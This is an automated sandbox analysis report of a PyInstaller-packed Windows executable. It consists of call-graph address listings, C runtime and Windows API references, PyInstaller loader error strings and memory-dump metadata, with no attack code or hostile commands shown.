7ff62c0f3207 68933->68936 68945 7ff62c0f3037 __std_exception_destroy 68933->68945 68946 7ff62c0f1470 68933->68946 68976 7ff62c0f1c80 68933->68976 68986 7ff62c0f2710 54 API calls _log10_special 68934->68986 68937 7ff62c0f3273 68936->68937 68982 7ff62c10a404 37 API calls 2 library calls 68936->68982 68939 7ff62c0f3290 68937->68939 68940 7ff62c0f329e 68937->68940 68983 7ff62c10a404 37 API calls 2 library calls 68939->68983 68984 7ff62c0f2dd0 37 API calls 68940->68984 68943 7ff62c0f329c 68985 7ff62c0f2500 54 API calls __std_exception_destroy 68943->68985 68945->68925 68989 7ff62c0f45c0 68946->68989 68949 7ff62c0f14bc 68999 7ff62c1006d4 68949->68999 68950 7ff62c0f149b 69029 7ff62c0f2710 54 API calls _log10_special 68950->69029 68953 7ff62c0f14ab 68953->68933 68954 7ff62c0f14d1 68955 7ff62c0f14d5 68954->68955 68956 7ff62c0f14f8 68954->68956 69030 7ff62c104f08 11 API calls _get_daylight 68955->69030 68960 7ff62c0f1532 68956->68960 68961 7ff62c0f1508 68956->68961 68958 7ff62c0f14da 69031 7ff62c0f2910 54 API calls _log10_special 68958->69031 68963 7ff62c0f154b 68960->68963 68964 7ff62c0f1538 68960->68964 69032 7ff62c104f08 11 API calls _get_daylight 68961->69032 68971 7ff62c0f15d6 68963->68971 68975 7ff62c0f14f3 __std_exception_destroy 68963->68975 69034 7ff62c10039c 68963->69034 69003 7ff62c0f1210 68964->69003 68965 7ff62c0f1510 69033 7ff62c0f2910 54 API calls _log10_special 68965->69033 68970 7ff62c0f15c4 68970->68933 69037 7ff62c104f08 11 API calls _get_daylight 68971->69037 68973 7ff62c0f15db 69038 7ff62c0f2910 54 API calls _log10_special 68973->69038 69025 7ff62c10004c 68975->69025 68977 7ff62c0f1ca5 68976->68977 69282 7ff62c104984 68977->69282 68980->68945 68981->68945 68982->68937 68983->68943 68984->68943 68985->68945 68986->68945 68987->68945 68988->68945 68990 7ff62c0f45cc 68989->68990 69039 7ff62c0f9390 68990->69039 68992 7ff62c0f45f4 68993 7ff62c0f9390 2 API calls 68992->68993 68994 7ff62c0f4607 68993->68994 69044 7ff62c105f94 68994->69044 68997 7ff62c0fc550 
_log10_special 8 API calls 68998 7ff62c0f1493 68997->68998 68998->68949 68998->68950 69000 7ff62c100704 68999->69000 69215 7ff62c100464 69000->69215 69002 7ff62c10071d 69002->68954 69004 7ff62c0f1268 69003->69004 69005 7ff62c0f126f 69004->69005 69006 7ff62c0f1297 69004->69006 69232 7ff62c0f2710 54 API calls _log10_special 69005->69232 69009 7ff62c0f12d4 69006->69009 69010 7ff62c0f12b1 69006->69010 69008 7ff62c0f1282 69008->68975 69013 7ff62c0f12e6 69009->69013 69023 7ff62c0f1309 memcpy_s 69009->69023 69233 7ff62c104f08 11 API calls _get_daylight 69010->69233 69012 7ff62c0f12b6 69234 7ff62c0f2910 54 API calls _log10_special 69012->69234 69235 7ff62c104f08 11 API calls _get_daylight 69013->69235 69016 7ff62c0f12eb 69236 7ff62c0f2910 54 API calls _log10_special 69016->69236 69017 7ff62c10039c _fread_nolock 53 API calls 69017->69023 69019 7ff62c0f12cf __std_exception_destroy 69019->68975 69020 7ff62c0f13cf 69237 7ff62c0f2710 54 API calls _log10_special 69020->69237 69023->69017 69023->69019 69023->69020 69024 7ff62c100110 37 API calls 69023->69024 69228 7ff62c100adc 69023->69228 69024->69023 69026 7ff62c10007c 69025->69026 69254 7ff62c0ffe28 69026->69254 69028 7ff62c100095 69028->68970 69029->68953 69030->68958 69031->68975 69032->68965 69033->68975 69266 7ff62c1003bc 69034->69266 69037->68973 69038->68975 69040 7ff62c0f93b2 MultiByteToWideChar 69039->69040 69041 7ff62c0f93d6 69039->69041 69040->69041 69043 7ff62c0f93ec __std_exception_destroy 69040->69043 69042 7ff62c0f93f3 MultiByteToWideChar 69041->69042 69041->69043 69042->69043 69043->68992 69047 7ff62c105ec8 69044->69047 69045 7ff62c105eee 69075 7ff62c104f08 11 API calls _get_daylight 69045->69075 69047->69045 69049 7ff62c105f21 69047->69049 69048 7ff62c105ef3 69076 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69048->69076 69051 7ff62c105f34 69049->69051 69052 7ff62c105f27 69049->69052 69063 7ff62c10ac28 69051->69063 69077 7ff62c104f08 11 API calls _get_daylight 69052->69077 69054 7ff62c0f4616 69054->68997 
69057 7ff62c105f55 69070 7ff62c10fecc 69057->69070 69058 7ff62c105f48 69078 7ff62c104f08 11 API calls _get_daylight 69058->69078 69061 7ff62c105f68 69079 7ff62c105478 LeaveCriticalSection 69061->69079 69080 7ff62c1102d8 EnterCriticalSection 69063->69080 69065 7ff62c10ac3f 69066 7ff62c10ac9c 19 API calls 69065->69066 69067 7ff62c10ac4a 69066->69067 69068 7ff62c110338 _isindst LeaveCriticalSection 69067->69068 69069 7ff62c105f3e 69068->69069 69069->69057 69069->69058 69081 7ff62c10fbc8 69070->69081 69074 7ff62c10ff26 69074->69061 69075->69048 69076->69054 69077->69054 69078->69054 69082 7ff62c10fc03 __vcrt_FlsAlloc 69081->69082 69091 7ff62c10fdca 69082->69091 69096 7ff62c107a3c 51 API calls 3 library calls 69082->69096 69084 7ff62c10fea1 69100 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69084->69100 69086 7ff62c10fdd3 69086->69074 69093 7ff62c116d54 69086->69093 69088 7ff62c10fe35 69088->69091 69097 7ff62c107a3c 51 API calls 3 library calls 69088->69097 69090 7ff62c10fe54 69090->69091 69098 7ff62c107a3c 51 API calls 3 library calls 69090->69098 69091->69086 69099 7ff62c104f08 11 API calls _get_daylight 69091->69099 69101 7ff62c116354 69093->69101 69096->69088 69097->69090 69098->69091 69099->69084 69100->69086 69102 7ff62c116389 69101->69102 69103 7ff62c11636b 69101->69103 69102->69103 69106 7ff62c1163a5 69102->69106 69155 7ff62c104f08 11 API calls _get_daylight 69103->69155 69105 7ff62c116370 69156 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69105->69156 69112 7ff62c116964 69106->69112 69110 7ff62c11637c 69110->69074 69158 7ff62c116698 69112->69158 69115 7ff62c1169d9 69189 7ff62c104ee8 11 API calls _get_daylight 69115->69189 69116 7ff62c1169f1 69177 7ff62c108520 69116->69177 69119 7ff62c1169de 69190 7ff62c104f08 11 API calls _get_daylight 69119->69190 69127 7ff62c1163d0 69127->69110 69157 7ff62c1084f8 LeaveCriticalSection 69127->69157 69155->69105 69156->69110 69159 7ff62c1166c4 69158->69159 69162 7ff62c1166de 69158->69162 69159->69162 69202 
7ff62c104f08 11 API calls _get_daylight 69159->69202 69161 7ff62c1166d3 69203 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69161->69203 69164 7ff62c11675c 69162->69164 69204 7ff62c104f08 11 API calls _get_daylight 69162->69204 69165 7ff62c1167ad 69164->69165 69206 7ff62c104f08 11 API calls _get_daylight 69164->69206 69175 7ff62c11680a 69165->69175 69208 7ff62c109b78 37 API calls 2 library calls 69165->69208 69168 7ff62c116806 69168->69175 69209 7ff62c10a900 IsProcessorFeaturePresent 69168->69209 69169 7ff62c1167a2 69207 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69169->69207 69172 7ff62c116751 69205 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69172->69205 69175->69115 69175->69116 69214 7ff62c1102d8 EnterCriticalSection 69177->69214 69189->69119 69190->69127 69202->69161 69203->69162 69204->69172 69205->69164 69206->69169 69207->69165 69208->69168 69210 7ff62c10a913 69209->69210 69213 7ff62c10a614 14 API calls 3 library calls 69210->69213 69212 7ff62c10a92e GetCurrentProcess TerminateProcess 69213->69212 69216 7ff62c1004ce 69215->69216 69217 7ff62c10048e 69215->69217 69216->69217 69218 7ff62c1004da 69216->69218 69227 7ff62c10a814 37 API calls 2 library calls 69217->69227 69226 7ff62c10546c EnterCriticalSection 69218->69226 69221 7ff62c1004b5 69221->69002 69222 7ff62c1004df 69223 7ff62c1005e8 71 API calls 69222->69223 69224 7ff62c1004f1 69223->69224 69225 7ff62c105478 _fread_nolock LeaveCriticalSection 69224->69225 69225->69221 69227->69221 69229 7ff62c100b0c 69228->69229 69238 7ff62c10082c 69229->69238 69231 7ff62c100b2a 69231->69023 69232->69008 69233->69012 69234->69019 69235->69016 69236->69019 69237->69019 69239 7ff62c10084c 69238->69239 69244 7ff62c100879 69238->69244 69240 7ff62c100881 69239->69240 69241 7ff62c100856 69239->69241 69239->69244 69245 7ff62c10076c 69240->69245 69252 7ff62c10a814 37 API calls 2 library calls 69241->69252 69244->69231 69253 7ff62c10546c EnterCriticalSection 69245->69253 69247 7ff62c100789 69248 7ff62c1007ac 
74 API calls 69247->69248 69249 7ff62c100792 69248->69249 69250 7ff62c105478 _fread_nolock LeaveCriticalSection 69249->69250 69251 7ff62c10079d 69250->69251 69251->69244 69252->69244 69255 7ff62c0ffe43 69254->69255 69256 7ff62c0ffe71 69254->69256 69265 7ff62c10a814 37 API calls 2 library calls 69255->69265 69263 7ff62c0ffe63 69256->69263 69264 7ff62c10546c EnterCriticalSection 69256->69264 69259 7ff62c0ffe88 69260 7ff62c0ffea4 72 API calls 69259->69260 69261 7ff62c0ffe94 69260->69261 69262 7ff62c105478 _fread_nolock LeaveCriticalSection 69261->69262 69262->69263 69263->69028 69265->69263 69267 7ff62c1003b4 69266->69267 69268 7ff62c1003e6 69266->69268 69267->68963 69268->69267 69269 7ff62c1003f5 __scrt_get_show_window_mode 69268->69269 69270 7ff62c100432 69268->69270 69280 7ff62c104f08 11 API calls _get_daylight 69269->69280 69279 7ff62c10546c EnterCriticalSection 69270->69279 69272 7ff62c10043a 69275 7ff62c10013c _fread_nolock 51 API calls 69272->69275 69274 7ff62c10040a 69281 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69274->69281 69277 7ff62c100451 69275->69277 69278 7ff62c105478 _fread_nolock LeaveCriticalSection 69277->69278 69278->69267 69280->69274 69281->69267 69286 7ff62c1049de 69282->69286 69283 7ff62c104a03 69300 7ff62c10a814 37 API calls 2 library calls 69283->69300 69285 7ff62c104a3f 69301 7ff62c102c10 49 API calls _invalid_parameter_noinfo 69285->69301 69286->69283 69286->69285 69288 7ff62c104ad6 69289 7ff62c104b1c 69288->69289 69293 7ff62c104af1 69288->69293 69294 7ff62c104b40 69288->69294 69297 7ff62c104ae8 69288->69297 69291 7ff62c10a948 __free_lconv_mon 11 API calls 69289->69291 69290 7ff62c0fc550 _log10_special 8 API calls 69292 7ff62c0f1cc8 69290->69292 69299 7ff62c104a2d 69291->69299 69292->68933 69302 7ff62c10a948 69293->69302 69294->69289 69295 7ff62c104b4a 69294->69295 69298 7ff62c10a948 __free_lconv_mon 11 API calls 69295->69298 69297->69289 69297->69293 69298->69299 69299->69290 69300->69299 69301->69288 69303 7ff62c10a94d HeapFree 
69302->69303 69304 7ff62c10a97c 69302->69304 69303->69304 69305 7ff62c10a968 GetLastError 69303->69305 69304->69299 69306 7ff62c10a975 __free_lconv_mon 69305->69306 69308 7ff62c104f08 11 API calls _get_daylight 69306->69308 69308->69304 69309 7ffdfab7eff0 69310 7ffdfab7f0f7 69309->69310 69311 7ffdfab7f011 69309->69311 69311->69310 69313 7ffdfab7e7d0 69311->69313 69314 7ffdfab7e9fb 69313->69314 69316 7ffdfab7e7fa 69313->69316 69314->69310 69316->69314 69317 7ffdfab80610 24 API calls 69316->69317 69319 7ffdfab7f6a0 69316->69319 69328 7ffdfab7d7a0 21 API calls 69316->69328 69317->69316 69320 7ffdfab7f6b2 69319->69320 69323 7ffdfab7f6ea 69319->69323 69321 7ffdfab7f6bc 69320->69321 69320->69323 69329 7ffdfab7d7a0 21 API calls 69321->69329 69322 7ffdfab7f73b 69322->69316 69323->69322 69330 7ffdfab7d7a0 21 API calls 69323->69330 69326 7ffdfab7f6e4 69326->69316 69327 7ffdfab7f735 69327->69316 69328->69316 69329->69326 69330->69327 69331 7ff62c0fbae0 69332 7ff62c0fbb0e 69331->69332 69333 7ff62c0fbaf5 69331->69333 69333->69332 69336 7ff62c10d5fc 69333->69336 69337 7ff62c10d647 69336->69337 69341 7ff62c10d60b _get_daylight 69336->69341 69344 7ff62c104f08 11 API calls _get_daylight 69337->69344 69339 7ff62c10d62e HeapAlloc 69340 7ff62c0fbb6e 69339->69340 69339->69341 69341->69337 69341->69339 69343 7ff62c113590 EnterCriticalSection LeaveCriticalSection _get_daylight 69341->69343 69343->69341 69344->69340 69345 7ff62c10f98c 69346 7ff62c10fb7e 69345->69346 69348 7ff62c10f9ce _isindst 69345->69348 69392 7ff62c104f08 11 API calls _get_daylight 69346->69392 69348->69346 69351 7ff62c10fa4e _isindst 69348->69351 69349 7ff62c0fc550 _log10_special 8 API calls 69350 7ff62c10fb99 69349->69350 69366 7ff62c116194 69351->69366 69356 7ff62c10fbaa 69357 7ff62c10a900 _isindst 17 API calls 69356->69357 69359 7ff62c10fbbe 69357->69359 69363 7ff62c10faab 69365 7ff62c10fb6e 69363->69365 69391 7ff62c1161d8 37 API calls _isindst 69363->69391 69365->69349 69367 7ff62c10fa6c 69366->69367 69368 
7ff62c1161a3 69366->69368 69373 7ff62c115598 69367->69373 69393 7ff62c1102d8 EnterCriticalSection 69368->69393 69370 7ff62c1161ab 69371 7ff62c1161bc 69370->69371 69372 7ff62c116004 55 API calls 69370->69372 69372->69371 69374 7ff62c10fa81 69373->69374 69375 7ff62c1155a1 69373->69375 69374->69356 69379 7ff62c1155c8 69374->69379 69394 7ff62c104f08 11 API calls _get_daylight 69375->69394 69377 7ff62c1155a6 69395 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69377->69395 69380 7ff62c1155d1 69379->69380 69384 7ff62c10fa92 69379->69384 69396 7ff62c104f08 11 API calls _get_daylight 69380->69396 69382 7ff62c1155d6 69397 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69382->69397 69384->69356 69385 7ff62c1155f8 69384->69385 69386 7ff62c10faa3 69385->69386 69387 7ff62c115601 69385->69387 69386->69356 69386->69363 69398 7ff62c104f08 11 API calls _get_daylight 69387->69398 69389 7ff62c115606 69399 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69389->69399 69391->69365 69392->69365 69394->69377 69395->69374 69396->69382 69397->69384 69398->69389 69399->69386 69400 7ff62c0fcc3c 69421 7ff62c0fce0c 69400->69421 69403 7ff62c0fcd88 69572 7ff62c0fd12c 7 API calls 2 library calls 69403->69572 69404 7ff62c0fcc58 __scrt_acquire_startup_lock 69406 7ff62c0fcd92 69404->69406 69412 7ff62c0fcc76 __scrt_release_startup_lock 69404->69412 69573 7ff62c0fd12c 7 API calls 2 library calls 69406->69573 69408 7ff62c0fcc9b 69409 7ff62c0fcd9d __FrameHandler3::FrameUnwindToEmptyState 69410 7ff62c0fcd21 69427 7ff62c0fd274 69410->69427 69412->69408 69412->69410 69569 7ff62c109b2c 45 API calls 69412->69569 69413 7ff62c0fcd26 69430 7ff62c0f1000 69413->69430 69418 7ff62c0fcd49 69418->69409 69571 7ff62c0fcf90 7 API calls 69418->69571 69420 7ff62c0fcd60 69420->69408 69422 7ff62c0fce14 69421->69422 69423 7ff62c0fce20 __scrt_dllmain_crt_thread_attach 69422->69423 69424 7ff62c0fce2d 69423->69424 69426 7ff62c0fcc50 69423->69426 69424->69426 69574 7ff62c0fd888 7 API calls 2 library calls 
69424->69574 69426->69403 69426->69404 69575 7ff62c11a4d0 69427->69575 69429 7ff62c0fd28b GetStartupInfoW 69429->69413 69431 7ff62c0f1009 69430->69431 69577 7ff62c105484 69431->69577 69433 7ff62c0f37fb 69584 7ff62c0f36b0 69433->69584 69437 7ff62c0fc550 _log10_special 8 API calls 69439 7ff62c0f3ca7 69437->69439 69570 7ff62c0fd2b8 GetModuleHandleW 69439->69570 69440 7ff62c0f383c 69443 7ff62c0f1c80 49 API calls 69440->69443 69441 7ff62c0f391b 69442 7ff62c0f45c0 108 API calls 69441->69442 69444 7ff62c0f392b 69442->69444 69445 7ff62c0f385b 69443->69445 69446 7ff62c0f396a 69444->69446 69683 7ff62c0f7f90 69444->69683 69656 7ff62c0f8830 69445->69656 69692 7ff62c0f2710 54 API calls _log10_special 69446->69692 69450 7ff62c0f388e 69457 7ff62c0f38bb __std_exception_destroy 69450->69457 69682 7ff62c0f89a0 40 API calls __std_exception_destroy 69450->69682 69451 7ff62c0f395d 69452 7ff62c0f3984 69451->69452 69453 7ff62c0f3962 69451->69453 69456 7ff62c0f1c80 49 API calls 69452->69456 69455 7ff62c10004c 74 API calls 69453->69455 69455->69446 69458 7ff62c0f39a3 69456->69458 69459 7ff62c0f8830 14 API calls 69457->69459 69467 7ff62c0f38de __std_exception_destroy 69457->69467 69462 7ff62c0f1950 115 API calls 69458->69462 69459->69467 69461 7ff62c0f3a0b 69695 7ff62c0f89a0 40 API calls __std_exception_destroy 69461->69695 69464 7ff62c0f39ce 69462->69464 69464->69445 69466 7ff62c0f39de 69464->69466 69465 7ff62c0f3a17 69696 7ff62c0f89a0 40 API calls __std_exception_destroy 69465->69696 69693 7ff62c0f2710 54 API calls _log10_special 69466->69693 69472 7ff62c0f390e __std_exception_destroy 69467->69472 69694 7ff62c0f8940 40 API calls __std_exception_destroy 69467->69694 69470 7ff62c0f3a23 69697 7ff62c0f89a0 40 API calls __std_exception_destroy 69470->69697 69473 7ff62c0f8830 14 API calls 69472->69473 69474 7ff62c0f3a3b 69473->69474 69475 7ff62c0f3b2f 69474->69475 69476 7ff62c0f3a60 __std_exception_destroy 69474->69476 69699 7ff62c0f2710 54 API calls _log10_special 69475->69699 69486 
7ff62c0f3aab 69476->69486 69698 7ff62c0f8940 40 API calls __std_exception_destroy 69476->69698 69479 7ff62c0f8830 14 API calls 69480 7ff62c0f3bf4 __std_exception_destroy 69479->69480 69481 7ff62c0f3d41 69480->69481 69482 7ff62c0f3c46 69480->69482 69704 7ff62c0f44e0 49 API calls 69481->69704 69483 7ff62c0f3cd4 69482->69483 69484 7ff62c0f3c50 69482->69484 69488 7ff62c0f8830 14 API calls 69483->69488 69700 7ff62c0f90e0 59 API calls _log10_special 69484->69700 69486->69479 69491 7ff62c0f3ce0 69488->69491 69489 7ff62c0f3d4f 69492 7ff62c0f3d65 69489->69492 69493 7ff62c0f3d71 69489->69493 69490 7ff62c0f3c55 69495 7ff62c0f3cb3 69490->69495 69496 7ff62c0f3c61 69490->69496 69491->69496 69499 7ff62c0f3ced 69491->69499 69705 7ff62c0f4630 69492->69705 69494 7ff62c0f1c80 49 API calls 69493->69494 69509 7ff62c0f3d2b __std_exception_destroy 69494->69509 69702 7ff62c0f8660 86 API calls 2 library calls 69495->69702 69701 7ff62c0f2710 54 API calls _log10_special 69496->69701 69503 7ff62c0f1c80 49 API calls 69499->69503 69500 7ff62c0f3dbc 69504 7ff62c0f9390 2 API calls 69500->69504 69501 7ff62c0f3cbb 69505 7ff62c0f3cbf 69501->69505 69506 7ff62c0f3cc8 69501->69506 69507 7ff62c0f3d0b 69503->69507 69511 7ff62c0f3dcf SetDllDirectoryW 69504->69511 69505->69496 69506->69509 69508 7ff62c0f3d12 69507->69508 69507->69509 69703 7ff62c0f2710 54 API calls _log10_special 69508->69703 69509->69500 69510 7ff62c0f3da7 LoadLibraryExW 69509->69510 69510->69500 69515 7ff62c0f3e02 69511->69515 69557 7ff62c0f3e52 69511->69557 69514 7ff62c0f3808 __std_exception_destroy 69514->69437 69517 7ff62c0f8830 14 API calls 69515->69517 69516 7ff62c0f4000 69519 7ff62c0f402d 69516->69519 69520 7ff62c0f400a PostMessageW GetMessageW 69516->69520 69523 7ff62c0f3e0e __std_exception_destroy 69517->69523 69518 7ff62c0f3f13 69716 7ff62c0f33c0 121 API calls 2 library calls 69518->69716 69669 7ff62c0f3360 69519->69669 69520->69519 69522 7ff62c0f3f1b 69522->69514 69524 7ff62c0f3f23 69522->69524 69526 7ff62c0f3eea 69523->69526 
69531 7ff62c0f3e46 69523->69531 69717 7ff62c0f90c0 LocalFree 69524->69717 69715 7ff62c0f8940 40 API calls __std_exception_destroy 69526->69715 69531->69557 69708 7ff62c0f6dc0 54 API calls _get_daylight 69531->69708 69539 7ff62c0f4053 69542 7ff62c0f3e64 69709 7ff62c0f7340 117 API calls 2 library calls 69542->69709 69546 7ff62c0f3e79 69548 7ff62c0f3e9a 69546->69548 69560 7ff62c0f3e7d 69546->69560 69710 7ff62c0f6e00 120 API calls _log10_special 69546->69710 69548->69560 69711 7ff62c0f71b0 125 API calls 69548->69711 69552 7ff62c0f3eaf 69552->69560 69712 7ff62c0f74f0 55 API calls 69552->69712 69554 7ff62c0f3ed8 69714 7ff62c0f6fc0 FreeLibrary 69554->69714 69557->69516 69557->69518 69560->69557 69713 7ff62c0f2a50 54 API calls _log10_special 69560->69713 69569->69410 69570->69418 69571->69420 69572->69406 69573->69409 69574->69426 69576 7ff62c11a4c0 69575->69576 69576->69429 69576->69576 69580 7ff62c10f480 69577->69580 69578 7ff62c10f4d3 69719 7ff62c10a814 37 API calls 2 library calls 69578->69719 69580->69578 69581 7ff62c10f526 69580->69581 69720 7ff62c10f358 71 API calls _fread_nolock 69581->69720 69583 7ff62c10f4fc 69583->69433 69721 7ff62c0fc850 69584->69721 69587 7ff62c0f3710 69723 7ff62c0f9280 FindFirstFileExW 69587->69723 69588 7ff62c0f36eb GetLastError 69728 7ff62c0f2c50 51 API calls _log10_special 69588->69728 69592 7ff62c0f3723 69729 7ff62c0f9300 CreateFileW GetFinalPathNameByHandleW CloseHandle 69592->69729 69593 7ff62c0f377d 69731 7ff62c0f9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 69593->69731 69595 7ff62c0fc550 _log10_special 8 API calls 69597 7ff62c0f37b5 69595->69597 69597->69514 69606 7ff62c0f1950 69597->69606 69598 7ff62c0f3730 69601 7ff62c0f3734 69598->69601 69602 7ff62c0f374c __vcrt_FlsAlloc 69598->69602 69599 7ff62c0f3706 69599->69595 69600 7ff62c0f378b 69600->69599 69732 7ff62c0f2810 49 API calls _log10_special 69600->69732 69730 7ff62c0f2810 49 API calls _log10_special 69601->69730 69602->69593 69605 7ff62c0f3745 69605->69599 

Control-flow Graph

[Control-flow graph 0, starting at block 7ff62c0f1000-7ff62c0f3806; legend: Executed, Not Executed]
Strings
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
• API String ID: 2776309574-4232158417
• Opcode ID: 0fbc70c4027613d0d861555d20556e9b1b6679d528821aa3e7ef290c14fd0fef
• Instruction ID: 07fd297666852b32e2404955a40a48b84be1a2526650888eaf70879d5613dbf1
• Opcode Fuzzy Hash: 0fbc70c4027613d0d861555d20556e9b1b6679d528821aa3e7ef290c14fd0fef
• Instruction Fuzzy Hash: D5329D21A0C68299FE15DB259C6A3F92391AF557B0F444032DE4DC32C6EF6EE598C30A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID:
• String ID: always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$too many columns on %s$txet
• API String ID: 0-2711416707
• Opcode ID: c6d4e951f0317217e6ba4f122beb4f7973f3fbefd4f05179ad54bf97b0fcfda1
• Instruction ID: 8f09b48ab60fd1f4695731ea83ea178c5f00d79c0da61b7a326002b6691e2035
• Opcode Fuzzy Hash: c6d4e951f0317217e6ba4f122beb4f7973f3fbefd4f05179ad54bf97b0fcfda1
• Instruction Fuzzy Hash: C9225772B0C6D245EB6D8B259070BB97FA1EB41B44F8881B6DABE473DACB3DD5418700

Control-flow Graph

[Control-flow graph 497, starting at block 7ff62c115c00-7ff62c115c3b; legend: Executed, Not Executed]
APIs
• _get_daylight.LIBCMT ref: 00007FF62C115C45
  • Part of subcall function 00007FF62C115598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155AC
  • Part of subcall function 00007FF62C10A948: HeapFree.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
  • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
  • Part of subcall function 00007FF62C10A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62C10A8DF,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10A909
  • Part of subcall function 00007FF62C10A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62C10A8DF,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10A92E
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115C34
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C11560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EAA
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EBB
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115ECC
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62C11610C), ref: 00007FF62C115EF3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                              • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                              • Instruction ID: d061b790e320011e79604dc9619bf2e00105fd14082ef2a8b2f39ae4daa24266
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D1D526F0865286EF20DF2ADC4A1B96761EFA47B4F848036DE0DC7A95DF7CE4418742

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
